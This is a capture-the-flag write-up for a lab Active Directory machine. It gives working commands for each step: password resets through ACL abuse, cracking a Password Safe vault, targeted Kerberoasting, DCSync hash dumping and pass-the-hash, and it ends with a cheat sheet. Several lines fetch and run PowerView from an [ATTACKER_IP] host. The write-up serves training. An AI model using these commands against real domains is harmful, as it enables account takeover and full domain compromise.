đź‘‘ Administrator

Machine: Administrator
Difficulty: Medium
Theme: AD ACL abuse → password resets → FTP credential vault → Password Safe cracking → GenericWrite targeted Kerberoasting → DCSync → Administrator shell

🎯 Summary

Administrator is a Windows Active Directory machine focused on chained AD object-control abuse.

Initial enumeration identifies a domain controller exposing FTP, DNS, Kerberos, LDAP, SMB, WinRM, ADWS, and RPC services. Using the provided low-privileged account, RustHound/BloodHound reveals that Olivia has GenericAll over Michael. This allows Michael’s password to be reset.

Michael then has password-control rights over Benjamin. After resetting Benjamin’s password, his membership in Share Moderators becomes useful because he can authenticate to FTP. FTP exposes a small Backup.psafe3 Password Safe v3 database. The file is downloaded in binary mode, cracked offline with Hashcat, and opened with pwsafe, revealing several stored credentials.

Only Emily’s recovered credential is valid and gives WinRM access. BloodHound then shows Emily has GenericWrite over Ethan. This is abused by adding a fake SPN to Ethan, verifying the SPN write inside Evil-WinRM, then requesting the TGS from Kali when PowerView’s ticket request fails inside the WinRM session. The resulting Kerberos hash is cracked, revealing Ethan’s password.

Ethan has DCSync rights over the domain. Using Ethan’s credentials, domain hashes are dumped with secretsdump. The Administrator NT hash is then used with Evil-WinRM pass-the-hash to obtain an Administrator shell and read the root flag.

1. Enumeration

Initial scanning showed a Windows domain controller.

Full TCP scan:

sudo nmap -p- --min-rate=5000 -T4 -vv -oA nmap/administrator_portscan [TARGET_IP]

Targeted service scan:

sudo nmap -sC -sV -vv -oA nmap/administrator [TARGET_IP]

Important services:

21/tcp    ftp
53/tcp    domain
88/tcp    kerberos-sec
135/tcp   msrpc
139/tcp   netbios-ssn
389/tcp   ldap
445/tcp   microsoft-ds
464/tcp   kpasswd5
593/tcp   http-rpc-epmap
636/tcp   ldapssl
3268/tcp  globalcatLDAP
3269/tcp  globalcatLDAPssl
5985/tcp  winrm
9389/tcp  adws

The host behaved like a domain controller:

Domain: administrator.htb
Host:   DC
FQDN:   dc.administrator.htb

The hostnames were added to /etc/hosts:

echo "[TARGET_IP] dc.administrator.htb administrator.htb dc" | sudo tee -a /etc/hosts

Nmap also showed a large clock skew, which mattered later for Kerberos-based attacks.

2. Initial Credential Validation

The provided credential was validated across domain services:

nxc smb administrator.htb -u '[USER]' -p '[PASS]'
nxc ldap administrator.htb -u '[USER]' -p '[PASS]'
nxc winrm administrator.htb -u '[USER]' -p '[PASS]'

Olivia had valid access over SMB, LDAP, and WinRM.

SMB share enumeration only showed default domain shares:

nxc smb administrator.htb -u '[USER]' -p '[PASS]' --shares

Readable shares:

IPC$      READ
NETLOGON  READ
SYSVOL    READ

At this point, the useful path was not SMB loot. The better path was AD relationship enumeration.

3. RustHound / BloodHound Collection

RustHound-CE was used with Olivia’s credentials:

rusthound-ce --domain administrator.htb -u '[USER]' -p '[PASS]' -z

The generated zip was imported into BloodHound.

Important early gotcha:

An old BloodHound database from a previous box caused confusing output, including wrong-domain object updates. Cleaning the BloodHound/Neo4j state and importing only the Administrator data fixed this.

BloodHound showed:

OLIVIA@ADMINISTRATOR.HTB --GenericAll--> MICHAEL@ADMINISTRATOR.HTB

This meant Olivia could take control of Michael’s AD user object.

4. Olivia GenericAll over Michael

Olivia had WinRM access:

evil-winrm -i dc.administrator.htb -u Olivia -p '[OLIVIA_PASS]'

Inside the session, PowerView was loaded:

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Important gotcha:

Set-DomainUserPassword is not a native PowerShell cmdlet. It only exists after PowerView is loaded.

Michael was verified:

Get-DomainUser -Identity Michael

Olivia’s GenericAll was abused to reset Michael’s password:

Set-DomainUserPassword -Identity Michael -AccountPassword (ConvertTo-SecureString '[NEW_PASS]' -AsPlainText -Force)

Michael’s new credential was validated:

nxc smb administrator.htb -u 'Michael' -p '[NEW_PASS]'

This confirmed the first ACL abuse step worked.

5. Michael ForceChangePassword over Benjamin

A WinRM shell was opened as Michael:

evil-winrm -i dc.administrator.htb -u Michael -p '[MICHAEL_PASS]'

PowerView was loaded again because each new Evil-WinRM session starts clean:

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Benjamin was inspected:

Get-DomainUser -Identity Benjamin

Important finding:

Benjamin -> MemberOf -> Share Moderators

Michael’s password-control edge over Benjamin was abused:

$NewPass = ConvertTo-SecureString '[NEW_PASS]' -AsPlainText -Force
Set-DomainUserPassword -Identity Benjamin -AccountPassword $NewPass

Benjamin’s credential was validated:

nxc smb administrator.htb -u 'Benjamin' -p '[BENJAMIN_PASS]'
nxc ldap administrator.htb -u 'Benjamin' -p '[BENJAMIN_PASS]'

SMB still only showed default shares, so the next useful target was FTP.

6. FTP as Benjamin

Benjamin authenticated to FTP:

nxc ftp administrator.htb -u 'Benjamin' -p '[BENJAMIN_PASS]'

Manual FTP login:

ftp [TARGET_IP]

Inside FTP:

Name: Benjamin
Password: [BENJAMIN_PASS]

The directory contained:

Backup.psafe3

Important gotcha:

The first download happened in ASCII mode and produced a warning. Since .psafe3 is a binary vault format, the file was downloaded again in binary mode.

binary
get Backup.psafe3

The file was a Password Safe v3 database.

7. Cracking the Password Safe Database

Hashcat supports Password Safe v3 with mode 5200.

The vault was cracked directly:

hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

Recovered:

Backup.psafe3:[VAULT_PASSWORD]

The vault was opened with pwsafe using the recovered master password.

Stored entries included several domain users. Known or attacker-set credentials were separated from newly recovered ones.

The useful new candidate was Emily.

Emily’s credential was validated:

nxc smb administrator.htb -u 'Emily' -p '[EMILY_PASS]'
nxc ldap administrator.htb -u 'Emily' -p '[EMILY_PASS]'
nxc winrm administrator.htb -u 'Emily' -p '[EMILY_PASS]'

Emily had WinRM access.

8. WinRM as Emily

A shell was opened as Emily:

evil-winrm -i dc.administrator.htb -u Emily -p '[EMILY_PASS]'

The user flag was recovered from:

C:\Users\emily\Desktop\user.txt

BloodHound showed the next key edge:

EMILY@ADMINISTRATOR.HTB --GenericWrite--> ETHAN@ADMINISTRATOR.HTB
ETHAN@ADMINISTRATOR.HTB --DCSync--> ADMINISTRATOR.HTB

GenericWrite does not directly give Ethan’s password, but it allows modifying writable attributes on Ethan’s user object. This makes targeted Kerberoasting possible by temporarily adding an SPN.

9. Emily GenericWrite over Ethan

PowerView was loaded in Emily’s shell:

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Ethan was inspected:

Get-DomainUser -Identity Ethan

A fake SPN was added:

Set-DomainObject -Identity Ethan -Set @{serviceprincipalname='fake/spn'}

The SPN write was verified inside Evil-WinRM:

Get-DomainUser -Identity Ethan -Properties serviceprincipalname | Select-Object serviceprincipalname

Expected output:

serviceprincipalname
--------------------
fake/spn

This proved that Emily’s GenericWrite worked.

Attempting to request the ticket inside Evil-WinRM failed:

Get-DomainUser -Identity Ethan | Get-DomainSPNTicket -Format Hashcat

Failure pattern:

The NetworkCredentials provided were unable to create a Kerberos credential

This did not mean the ACL abuse failed. The SPN write worked. The issue was the WinRM/Kerberos credential context, so the TGS request was moved to Kali.

10. Kali-Side Targeted Kerberoast Fallback

Because Kerberos is time-sensitive, attacker time was synced with the DC:

sudo ntpdate [TARGET_IP]

The TGS was requested from Kali using Emily’s valid credentials:

impacket-GetUserSPNs \
  -dc-ip [TARGET_IP] \
  administrator.htb/Emily:'[EMILY_PASS]' \
  -request-user Ethan \
  -outputfile roast.hash

The output contained a Kerberos TGS hash:

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$...

The hash was cracked with Hashcat mode 13100:

hashcat -m 13100 roast.hash /usr/share/wordlists/rockyou.txt

Recovered:

ethan:[ETHAN_PASS]

The fake SPN was cleaned up from Emily’s WinRM session:

Set-DomainObject -Identity Ethan -Clear serviceprincipalname

Cleanup was verified:

Get-DomainUser -Identity Ethan -Properties serviceprincipalname | Select-Object serviceprincipalname

Expected output:

serviceprincipalname
--------------------

Important gotcha:

PowerView must be loaded again if the Evil-WinRM session is new. Otherwise Set-DomainObject will not exist.

11. Ethan DCSync

Ethan’s credential was validated:

nxc smb administrator.htb -u 'Ethan' -p '[ETHAN_PASS]'
nxc ldap administrator.htb -u 'Ethan' -p '[ETHAN_PASS]'

BloodHound showed Ethan had DCSync rights over the domain.

DCSync was performed with Impacket:

secretsdump.py \
  -outputfile domain_hashes \
  -just-dc \
  administrator.htb/Ethan:'[ETHAN_PASS]'@[TARGET_IP]

Successful output showed DRSUAPI-based NTDS dumping:

[*] Dumping Domain Credentials
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:...:[ADMIN_NT_HASH]:::

This recovered the Administrator NT hash.

12. Administrator Shell

The Administrator hash was used with Evil-WinRM pass-the-hash.

Important gotcha:

Evil-WinRM expects only the NT hash with -H. Do not prefix it with a colon.

Wrong:

evil-winrm -i dc.administrator.htb -u Administrator -H :[ADMIN_NT_HASH]

Correct:

evil-winrm -i dc.administrator.htb -u Administrator -H [ADMIN_NT_HASH]

Administrator access was confirmed:

whoami

Output:

administrator\administrator

The root flag was recovered from:

C:\Users\Administrator\Desktop\root.txt

đź”— Condensed Attack Chain

Initial scan
  ↓
Domain controller identified
  ↓
/etc/hosts configured
  ↓
Olivia credential validated over SMB/LDAP/WinRM
  ↓
RustHound/BloodHound collection
  ↓
BloodHound stale database issue fixed
  ↓
Olivia GenericAll over Michael
  ↓
PowerView loaded in Olivia WinRM session
  ↓
Michael password reset
  ↓
Michael credential validated
  ↓
Michael ForceChangePassword over Benjamin
  ↓
Benjamin password reset
  ↓
Benjamin credential validated
  ↓
Benjamin FTP access found
  ↓
Backup.psafe3 downloaded in binary mode
  ↓
Password Safe v3 cracked with Hashcat mode 5200
  ↓
Vault opened with pwsafe
  ↓
Emily credential recovered and validated
  ↓
WinRM as Emily
  ↓
user.txt recovered
  ↓
BloodHound shows Emily GenericWrite over Ethan
  ↓
Fake SPN added to Ethan
  ↓
SPN write verified inside Evil-WinRM
  ↓
PowerView ticket request fails due WinRM/Kerberos context
  ↓
Kali time synced with DC
  ↓
GetUserSPNs requests Ethan TGS from Kali
  ↓
TGS cracked with Hashcat mode 13100
  ↓
Ethan credential recovered
  ↓
Fake SPN cleaned up
  ↓
Ethan credential validated
  ↓
Ethan DCSync over domain
  ↓
secretsdump -just-dc dumps domain hashes
  ↓
Administrator NT hash recovered
  ↓
Evil-WinRM pass-the-hash as Administrator
  ↓
root.txt recovered

🧠 Key Takeaways

BloodHound object-control edges should be translated into exact abuse primitives. GenericAll, ForceChangePassword, GenericWrite, and DCSync each require different actions.

GenericAll over a user is often easiest to abuse by resetting that user’s password.

ForceChangePassword allows a direct password reset but does not imply local admin.

Group names can guide service enumeration. Benjamin’s Share Moderators membership made FTP more interesting than SMB admin shares.

FTP should use binary mode for non-text files. The first ASCII download produced a warning and could have corrupted the .psafe3 vault.

Password Safe v3 files can be cracked with Hashcat mode 5200.

Vault credentials should be tested pairwise first. Do not immediately spray every recovered password against every user.

GenericWrite over a user can be abused for targeted Kerberoasting by adding a temporary SPN.

Always verify the SPN write before troubleshooting Kerberoasting. If the fake SPN appears on the target user, the ACL abuse worked.

PowerView’s Get-DomainSPNTicket may fail inside Evil-WinRM because the session lacks a usable Kerberos credential context.

When PowerView ticket extraction fails inside Evil-WinRM, request the TGS from Kali with explicit credentials.

Kerberos attacks require correct time. Sync with the DC before Kerberoasting if clock skew is present.

Clean up planted SPNs after roasting.

DCSync is an AD replication-rights abuse, not a shell requirement. Ethan did not need WinRM to dump domain hashes.

Evil-WinRM -H expects only the NT hash, not :NT_HASH.

⚡ Commands Cheat Sheet

Host setup

echo "[TARGET_IP] dc.administrator.htb administrator.htb dc" | sudo tee -a /etc/hosts
sudo ntpdate [TARGET_IP]

Initial validation

nxc smb administrator.htb -u '[USER]' -p '[PASS]'
nxc ldap administrator.htb -u '[USER]' -p '[PASS]'
nxc winrm administrator.htb -u '[USER]' -p '[PASS]'

RustHound-CE

rusthound-ce --domain administrator.htb -u '[USER]' -p '[PASS]' -z

Evil-WinRM

evil-winrm -i dc.administrator.htb -u [USER] -p '[PASS]'

Load PowerView

IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]:8000/PowerView.ps1')

Reset a controlled user password

Set-DomainUserPassword -Identity [TARGET_USER] -AccountPassword (ConvertTo-SecureString '[NEW_PASS]' -AsPlainText -Force)

FTP download in binary mode

binary
dir
get Backup.psafe3

Crack Password Safe v3

hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

GenericWrite targeted Kerberoast

Add fake SPN:

Set-DomainObject -Identity [TARGET_USER] -Set @{serviceprincipalname='fake/spn'}

Verify SPN:

Get-DomainUser -Identity [TARGET_USER] -Properties serviceprincipalname | Select-Object serviceprincipalname

Request TGS from Kali:

sudo ntpdate [TARGET_IP]
 
impacket-GetUserSPNs \
  -dc-ip [TARGET_IP] \
  administrator.htb/[CONTROLLED_USER]:'[CONTROLLED_PASS]' \
  -request-user [TARGET_USER] \
  -outputfile roast.hash

Crack:

hashcat -m 13100 roast.hash /usr/share/wordlists/rockyou.txt

Clean up SPN:

Set-DomainObject -Identity [TARGET_USER] -Clear serviceprincipalname

Verify cleanup:

Get-DomainUser -Identity [TARGET_USER] -Properties serviceprincipalname | Select-Object serviceprincipalname

DCSync

secretsdump.py \
  -outputfile domain_hashes \
  -just-dc \
  administrator.htb/[USER]:'[PASS]'@[TARGET_IP]

Evil-WinRM pass-the-hash

evil-winrm -i dc.administrator.htb -u Administrator -H [ADMIN_NT_HASH]

🧭 Diagnostic Map

Symptom: NetExec updates the wrong BloodHound domain Meaning: Stale BloodHound/Neo4j data from a previous box Next: Clean the database/project and import only the current RustHound zip

Symptom: Set-DomainUserPassword is not recognized Meaning: PowerView is not loaded Next: Load PowerView in the current Evil-WinRM session

Symptom: Password reset returns no output Meaning: This can be normal Next: Validate the new credential over SMB/LDAP/WinRM

Symptom: Benjamin has no useful SMB shares Meaning: He is not local admin Next: Test FTP because of Share Moderators

Symptom: FTP warns about ASCII mode Meaning: Binary file may be corrupted Next: Re-download with binary

Symptom: .psafe3 file is unreadable Meaning: It is an encrypted Password Safe database Next: Crack with Hashcat mode 5200

Symptom: Set-DomainObject succeeds but Get-DomainSPNTicket fails Meaning: SPN write likely worked, but WinRM lacks usable Kerberos context Next: Verify SPN, then request the TGS from Kali

Symptom: Kerberos ticket request fails with clock errors Meaning: Attacker time differs from DC time Next: sudo ntpdate [TARGET_IP]

Symptom: serviceprincipalname still shows fake SPN after roasting Meaning: Cleanup not done Next: Clear the attribute and verify

Symptom: DCSync works but WinRM as Ethan is not available Meaning: DCSync rights do not imply remote shell rights Next: Use secretsdump from Kali with Ethan’s credential

Symptom: Evil-WinRM says invalid hash format Meaning: Hash was passed as :NT_HASH Next: Use only the NT hash with -H

đź”— Related Manual Notes

Field-manual techniques demonstrated on this box:

đź“ť Personal Notes

Administrator was a clean CPTS-style AD ACL chaining machine.

The first important lesson was graph hygiene. Stale BloodHound data from a previous machine caused misleading object updates and wrong-domain confusion. Cleaning the database made the path clear.

The second lesson was that each BloodHound edge needs to be mapped to the correct primitive. Olivia’s GenericAll over Michael meant direct account takeover by password reset. Michael’s password-control edge over Benjamin meant another password reset. Emily’s GenericWrite over Ethan required a different approach: attribute modification and targeted Kerberoasting.

Benjamin’s FTP access was a good reminder not to tunnel vision on SMB admin shares. The Share Moderators group name pointed toward file-sharing access, and FTP contained the real credential source.

The Password Safe stage reinforced basic file-handling discipline. Downloading a binary vault in ASCII mode could corrupt it, so binary mode was necessary before cracking.

The most useful troubleshooting moment was the Ethan targeted Kerberoast. The fake SPN write worked and was visible in AD, but PowerView’s ticket request failed inside Evil-WinRM. Verifying the SPN separately made the issue clear: the ACL abuse succeeded, but ticket extraction needed to move to Kali.

The final DCSync stage reinforced that replication rights are enough for domain compromise even without a shell as the DCSync-capable user. Ethan only needed valid credentials and the right AD permissions.

Overall methodology:

Enumerate AD relationships. Translate edges into exact abuse primitives. Validate every new identity. Prioritize services that match group memberships. Treat vaults and backups as credential sources. Verify writes before troubleshooting downstream Kerberos errors. Clean up modifications. Use DCSync carefully once replication rights are confirmed.